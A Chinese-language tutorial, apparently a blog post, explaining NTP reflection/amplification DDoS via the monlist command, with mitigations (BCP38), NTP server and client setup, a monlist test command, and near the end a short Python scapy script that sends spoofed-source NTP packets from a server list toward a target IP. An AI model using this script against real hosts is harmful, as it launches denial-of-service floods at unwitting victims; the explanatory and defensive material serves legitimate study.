NTP反射放大攻击

文章目录

什么是NTP

基于UDP协议的NTP(网络时间协议):使网络中各个计算机时间同步的一种协议

用途:把计算机时钟调节到世界调节时UDP

NTP反射放大攻击

  • UDP协议:面向无连接,客户端发送请求包源IP容易进行伪造

  • 反射攻击:修改客户端发送请求包中源IP为受害者IP,服务器端返回响应包返回到受害者IP

  • 放大攻击:一个请求包收到多个响应包

  • NTP反射放大攻击:一种分布式拒绝服务(DDoS)攻击

    服务器端回复一个带有欺骗源IP地址的数据包,而且至少有一个内置命令会对一个简短的请求发送一个长回复。这使得它成为DDoS工具的理想选择

    NTP 包含一个 monlist 功能( MON_GETLIST),主要用于监控 NTP 服务器。

    NTP 服务器响应monlist后就会返回响应包给和 NTP 服务器进行时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

解决方案

  • 可以通过访问open NTP项目来检查网络上是否有开放的NTP服务器支持MONLIST命令运行。

  • NTP和其他基于udp的放大攻击都依赖于源IP地址欺骗。如果攻击者不能欺骗源IP地址,那么他们只能自己攻击DDoS。如果正在运行一个网络,那么应该确保遵循BCP38,并防止带有欺骗源地址的数据包离开主机网络。可以使用麻省理工学院的Spoofer项目的工具来测试你的网络当前是否遵循BCP38。

搭建NTP服务器

部署服务器端

Windows server 2008

  • 修改注册表

依次展开数据项目,计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer,把Enabled设置为1,打开NTP服务

  • 打开NTP服务

找到windows time

windows NTP命令行

复制代码
启动:net start w32time
停止:net stop w32time

本机测试

如果有回显则服务正常

复制代码
w32tm /stripchart /computer:127.0.0.1

部署客户端

服务端部署成功后,如果要为客户端提供服务的话需要开放udp协议中的123端口,或者根据自身安全情况关闭防火墙。客户端下可以使用ntpdate命令来同步服务器时间,也可以使用chrony服务。

ntpdate

text 复制代码
# 安装ntpdate服务
sudo apt-get install ntpdate

# 安装完成后, 同步时间。xxx.xxx.xxx.xxx为你服务器的IP地址,clock -w把时间写入硬件。
sudo ntpdate xxx.xxx.xxx.xxx && clock -w

chrony

chrony是一个时间同步服务,通过配置可以把一台服务器变为NTP服务端或客户端,这里只用到客户端的功能。

text 复制代码
sudo apt-get install chrony

安装完成后打开配置文件

text 复制代码
vim /etc/chrony.conf

如果做客户端的话,只需要修改其中的一行文件,最后保存退出。

text 复制代码
# xxx为你的IP地址
server xxx.xxx.xxx.xxx

重启chrony服务,使用时间同步服务生效。

text 复制代码
systemctl restart chronyd

实验

linux中,可以使用ntpdate、ntpdc进行反射测试。

模拟协议,客户端执行以下命令,执行成功时,说明服务端存在被攻击风险,可实施攻击。

复制代码
ntpdate -n -c monlist x.x.x.x | wc -l(NTP服务的IP)

测试结果,此处内网由于数据量小

Python利用脚本

python 复制代码
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
from scapy.all import *

def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("执行方法: python xxx.py  攻击目标  ntp服务器文件")
        sys.exit(1)

    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)
相关推荐
用户962377954482 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机5 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机5 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954487 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star7 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544810 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全